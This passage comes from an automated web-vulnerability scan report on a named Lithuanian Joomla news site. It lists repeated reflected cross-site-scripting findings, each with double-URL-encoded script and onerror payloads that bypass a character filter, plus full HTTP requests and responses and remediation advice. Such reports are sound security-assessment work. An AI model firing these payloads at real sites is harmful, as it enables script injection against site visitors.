Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 19138


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos77c06"><script>alert(1)</script>261bfa3051b/5-pirmasis-joomla-gimtadienis.html" />
...[SNIP]...

4.1208. http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12fa2%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e2d7b242762e was submitted in the REST URL parameter 2. This input was echoed as 12fa2"><img src=a onerror=alert(1)>2d7b242762e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/12fa2%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e2d7b242762e HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/12fa2"><img src=a onerror=alert(1)>2d7b242762e" />
...[SNIP]...

4.1209. http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5928bb97d6 was submitted in the REST URL parameter 1. This input was echoed as 71a12"><script>alert(1)</script>a5928bb97d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos71a12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5928bb97d6/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:13 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos71a12"><script>alert(1)</script>a5928bb97d6/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html" />
...[SNIP]...

4.1210. http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80a32%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ebb4de7b080c was submitted in the REST URL parameter 2. This input was echoed as 80a32"><img src=a onerror=alert(1)>bb4de7b080c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/80a32%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ebb4de7b080c HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:59 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/80a32"><img src=a onerror=alert(1)>bb4de7b080c" />
...[SNIP]...

4.1211. http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24b05286a1 was submitted in the REST URL parameter 1. This input was echoed as acb65"><script>alert(1)</script>e24b05286a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienosacb65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24b05286a1/65-joomla-1522-versija-istaiso-saugumo-spraga.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:12 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienosacb65"><script>alert(1)</script>e24b05286a1/65-joomla-1522-versija-istaiso-saugumo-spraga.html" />
...[SNIP]...

4.1212. http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e877%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efe0b1bcf6c was submitted in the REST URL parameter 2. This input was echoed as 9e877"><img src=a onerror=alert(1)>fe0b1bcf6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/9e877%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efe0b1bcf6c HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:58 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/9e877"><img src=a onerror=alert(1)>fe0b1bcf6c" />
...[SNIP]...

4.1213. http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/67-joomla-16-rc1-versija.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad9c6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e980e766959d was submitted in the REST URL parameter 1. This input was echoed as ad9c6"><script>alert(1)</script>980e766959d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienosad9c6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e980e766959d/67-joomla-16-rc1-versija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:45 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienosad9c6"><script>alert(1)</script>980e766959d/67-joomla-16-rc1-versija.html" />
...[SNIP]...

4.1214. http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/67-joomla-16-rc1-versija.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 732e7%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253effdce0069 was submitted in the REST URL parameter 2. This input was echoed as 732e7"><img src=a onerror=alert(1)>ffdce0069 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/732e7%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253effdce0069 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13615


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/732e7"><img src=a onerror=alert(1)>ffdce0069" />
...[SNIP]...

4.1215. http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8404e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42b8d45929b was submitted in the REST URL parameter 1. This input was echoed as 8404e"><script>alert(1)</script>42b8d45929b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos8404e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42b8d45929b/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos8404e"><script>alert(1)</script>42b8d45929b/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html" />
...[SNIP]...

4.1216. http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f293%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e3dd01bbbb04 was submitted in the REST URL parameter 2. This input was echoed as 7f293"><img src=a onerror=alert(1)>3dd01bbbb04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/7f293%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e3dd01bbbb04 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16860


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/7f293"><img src=a onerror=alert(1)>3dd01bbbb04" />
...[SNIP]...

4.1217. http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 811dd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63483d0e7d7 was submitted in the REST URL parameter 1. This input was echoed as 811dd"><script>alert(1)</script>63483d0e7d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos811dd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63483d0e7d7/69-lithuanianjoomlacom-atnaujinama.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:39 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos811dd"><script>alert(1)</script>63483d0e7d7/69-lithuanianjoomlacom-atnaujinama.html" />
...[SNIP]...

4.1218. http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 752f0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee9c9deba8 was submitted in the REST URL parameter 2. This input was echoed as 752f0"><img src=a onerror=alert(1)>e9c9deba8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/752f0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee9c9deba8 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:28 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13615


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/752f0"><img src=a onerror=alert(1)>e9c9deba8" />
...[SNIP]...

4.1219. http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/70-joomla-16-isleista.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6edcf657b28 was submitted in the REST URL parameter 1. This input was echoed as 1b6f1"><script>alert(1)</script>6edcf657b28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos1b6f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6edcf657b28/70-joomla-16-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:33 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos1b6f1"><script>alert(1)</script>6edcf657b28/70-joomla-16-isleista.html" />
...[SNIP]...

4.1220. http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/70-joomla-16-isleista.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58a1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0a76c799042 was submitted in the REST URL parameter 2. This input was echoed as a58a1"><img src=a onerror=alert(1)>0a76c799042 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/a58a1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0a76c799042 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/a58a1"><img src=a onerror=alert(1)>0a76c799042" />
...[SNIP]...

4.1221. http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b70f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1469d13651 was submitted in the REST URL parameter 1. This input was echoed as 4b70f"><script>alert(1)</script>a1469d13651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

